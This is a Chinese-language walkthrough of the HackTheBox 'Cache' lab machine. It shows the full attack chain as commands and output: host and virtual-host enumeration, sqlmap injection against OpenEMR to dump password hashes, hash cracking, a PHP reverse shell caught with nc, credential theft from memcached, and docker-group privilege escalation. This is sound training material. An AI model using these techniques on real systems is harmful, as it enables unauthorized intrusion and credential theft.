0x01 Info Card
0x02 Tools and Tips
-
nmap
-
cewl
-
wfuzz
-
sqlmap
-
openEMR exploit
-
memcached exploit
-
docker priv
0x03 Pentesting
Initial Enumeration
nmap扫描
# Nmap 7.80 scan initiated Wed May 20 16:58:59 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.188
Nmap scan report for 10.10.10.188
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 20 17:00:01 2020 -- 1 IP address (1 host up) scanned in 61.63 seconds
80端口
主页没有什么有效信息,尝试暴力破解无效:
查看Network页面加载了functionality.js:
$(function(){
var error_correctPassword = false;
var error_username = false;
function checkCorrectPassword(){
var Password = $("#password").val();
if(Password != 'H@v3_fun'){
alert("Password didn't Match");
error_correctPassword = true;
}
}
function checkCorrectUsername(){
var Username = $("#username").val();
if(Username != "ash"){
alert("Username didn't Match");
error_username = true;
}
}
$("#loginform").submit(function(event) {
/* Act on the event */
error_correctPassword = false;
checkCorrectPassword();
error_username = false;
checkCorrectUsername();
if(error_correctPassword == false && error_username ==false){
return true;
}
else{
return false;
}
});
});
有登录名和密码ash:H@v3_fun,成功登录之后也没有可以利用的点,再看Author页面:
实在是没啥思路,去HTB forum私聊一下各位大佬,提示我用cewl工具提取Autor page's information,再去FUZZ HOST。
后来才知道用这个页面的单词和cewl工具生成一个包含域名的字典:
# kali @ kali in ~/HackTheBox/Cache [16:24:16]
$ cewl -w wordlist.txt -d 10 -m 1 http://10.10.10.188/author.html
CeWL 5.4.8 (Inclusion) Robin Wood ([email protected]) (https://digi.ninja/)
用wfuzz查找域名:
# kali @ kali in ~/HackTheBox/Cache [16:52:57]
$ wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.188/
Total requests: 42
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000037: 302 0 L 0 W 0 Ch "HMS"
Total time: 2.130227
Processed Requests: 42
Filtered Requests: 41
Requests/sec.: 19.71620
-hc 404 -hh 8193 这两个参数是为了限制一些无效的返回消息。
把HMS.htb加入到/etc/hosts文件中。
HMS.htb
弱口令无效,查找有没有公开的利用方式:
发现已经有很多不同版本的exploit,再尝试用OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution,运行之后提示要系统的账号和密码。Google OpenEMR,在YouTube上看到了一个SQL注入的相关漏洞。
根据视频的步骤,首先访问http://hms.htb/portal
点击Register后访问http://hms.htb/portal/add_edit_event_user.php,这里的eid参数存在SQL注入:
用burp拦截请求,把请求数据保存到req.txt:
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=0bcd8bfgl4rl2sfc8qmg63u09b; PHPSESSID=juj09jki6pu38k34afv60j3vb9
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
dump database
用sqlmap爆破数据库:
$ sqlmap -r req.txt --dbs --batch
[11:52:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[11:52:46] [INFO] fetching database names
[11:52:47] [INFO] retrieved: 'information_schema'
[11:52:48] [INFO] retrieved: 'openemr'
available databases [2]:
[*] information_schema
[*] openemr
然后接着就是sqlmap一把梭,找到users_secure数据表,查看username和password字段,dump
[12:03:13] [INFO] fetching entries of column(s) '`password`, username' for table 'users_secure' in database 'openemr'
Database: openemr
Table: users_secure
[1 entry]
+---------------+--------------------------------------------------------------+
| username | password |
+---------------+--------------------------------------------------------------+
| openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. |
+---------------+--------------------------------------------------------------+
用john爆破hash密码:
# kali @ kali in ~/HackTheBox/Cache [12:11:02]
$ sudo john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx (?)
1g 0:00:00:00 DONE (2020-05-27 12:11) 1.694g/s 1464p/s 1464c/s 1464C/s tristan..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed
得到登录用户名和密码:openemr_admin:xxxxxx。
upload reverse shell
通过Administration->Files模块上传reverse shell,写入letter_templates/custom_pdf.php文件中:
本机监听4444端口,浏览器访问http://hms.htb/sites/default/letter_templates/custom_pdf.php
$ sudo nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.188] 54188
bash: cannot set terminal process group (2111): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/sites/default/letter_templates$ id
<.htb/public_html/sites/default/letter_templates$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Getting User Access
用www用户在靶机漫游了一波,发现有ash用户,试一试密码复用,用functionality.js中的登录凭证切换ash用户:
www-data@cache:/var/www$ su ash
su ash
Password: H@v3_fun
ash@cache:/var/www$ id
id
uid=1000(ash) gid=1000(ash) groups=1000(ash)
ash@cache:~$ cat user.txt
cat user.txt
93bf------------------------8dfe
memcached exploit
查看本地运行服务:
ash@cache:~$ netstat -tulpn
netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
11211端口是运行memcached服务,利用方式(新技能Get):
https://www.hackingarticles.in/penetration-testing-on-memcached-server/
https://niiconsulting.com/checkmate/2013/05/memcache-exploit/
fetch the slab statistics:
ash@cache:~$ telnet 127.0.0.1 11211
telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'
stats slabs
stats slabs
STAT 1:chunk_size 96
STAT 1:chunks_per_page 10922
STAT 1:total_pages 1
STAT 1:total_chunks 10922
STAT 1:used_chunks 5
STAT 1:free_chunks 10917
STAT 1:free_chunks_end 0
STAT 1:mem_requested 371
STAT 1:get_hits 1
STAT 1:cmd_set 7730
STAT 1:delete_hits 0
STAT 1:incr_hits 0
STAT 1:decr_hits 0
STAT 1:cas_hits 0
STAT 1:cas_badval 0
STAT 1:touch_hits 0
STAT active_slabs 1
STAT total_malloced 1048576
END
通过slab id查看组织结构items:
stats items
stats items
STAT items:1:number 5
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 5
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 52
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 220
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 7735
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 1
STAT items:1:hits_to_temp 0
END
dump all the keys:
stats cachedump 1 0
stats cachedump 1 0
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END
读取user和passwd
get user
get user
VALUE user 0 5
luffy
END
get passwd
get passwd
VALUE passwd 0 9
0n3_p1ec3
END
SSH登录:
$ ssh [email protected]
The authenticity of host '10.10.10.188 (10.10.10.188)' can't be established.
ECDSA key fingerprint is SHA256:/qQ34g2zzGVlmbMIKeD7JhlhDf/SPzgYFz000v+3KBI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.188' (ECDSA) to the list of known hosts.
[email protected]'s password:
luffy@cache:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
观察到luffy是属于docker用户组。
Getting Root Access
GTFObins docke
查看docker镜像
luffy@cache:~$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ubuntu latest 2ca708c1c9cc 8 months ago 64.2MB
照着GTFObins给的方法进行提权:
luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
root@2b2647044657:/# id
uid=0(root) gid=0(root) groups=0(root)
root@2b2647044657:/# cd
root@2b2647044657:~# cat root.txt
32fc------------------------ceab
0x04 Reference
| Topic | Url |
|---|---|
| OpenEmr Vulnerability ( video) | https://www.youtube.com/watch?v=DJSQ8Pk_7hc&t=73s |
| Memecache | https://www.hackingarticles.in/penetration-testing-on-memcached-server/ |
| Memcacahe | https://niiconsulting.com/checkmate/2013/05/memcache-exploit/ |
| Docker | https://gtfobins.github.io/gtfobins/docker/ |
本文始发于微信公众号(星盟安全):HackTheBox-Cache-Walkthrough
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论